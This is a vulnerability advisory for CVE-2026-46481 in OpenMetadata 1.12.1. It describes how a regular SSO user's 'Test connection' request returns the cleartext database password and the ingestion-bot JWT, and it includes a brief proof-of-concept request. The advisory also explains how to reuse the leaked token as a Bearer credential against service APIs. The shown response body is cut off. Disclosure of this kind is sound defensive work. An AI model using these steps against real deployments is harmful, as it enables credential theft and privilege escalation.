CVE-2026-46481: OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users

(updated )

This is not applicable if an application is configuring the Secrets Store to store credentials. Please make sure to follow the best practices when deploying in production In OpenMetadata 1.12.1, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both:

  • The cleartext database password in request.connection.config.password.
  • The ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken.

The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs (for example, GET /api/v1/services/databaseServices/{id}?include=all) with bot-level privileges.

This looks different from GHSA-pqqf-7hxm-rj5r, because it affects the automations/workflows TEST_CONNECTION endpoint on OpenMetadata 1.12.1, not the ingestion pipelines endpoints.

Version / Product

  • Product: OpenMetadata (open source, Apache 2.0)
  • Version: 1.12.1
  • GET /api/v1/system/version → {“version”:“1.12.1”,“revision”:“618a2dc2ec8f70ffcd0378ee14ce92cb4f98f0c5”}
  • Deployment: OpenMetadata server with SSO via Azure AD (OAuth), Oracle database service, secrets in DB secrets manager (secretsManagerProvider: "db").

Preconditions

  • Authenticated SSO user with access to the UI.
  • User can open a Database Service and click “Test connection”.
  • No server admin role, no shell/DB access.

PoC (short)

  1. Login as a regular SSO user.

  2. In the UI go to: Settings → Services → Database Services → utplrac_scan2_srvetel Open the connection tab and click “Test connection”.

  3. The browser sends:

POST /api/v1/automations/workflows HTTP/1.1 Host: catalogodatos-test.utpl.edu.ec Authorization: Bearer <Azure_AD_user_JWT> Content-Type: application/json

{ “name”: “test-connection-Oracle-XXXX”, “workflowType”: “TEST_CONNECTION”, “request”: { “connection”: { “config”: { “type”: “Oracle”, “scheme”: “oracle+cx_oracle”, “username”: “qpro_gobierno_datos”, “password”: “********”, “hostPort”: “172.16.54.32:1521”, … } }, “serviceType”: “Database”, “connectionType”: “Oracle”, “serviceName”: “utplrac_scan2_srvetel” } }

Note: in the request the password is masked as “********”.

  1. The server responds with HTTP 201 and a body similar to:

References

Code Behaviors & Features

Detect and mitigate CVE-2026-46481 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →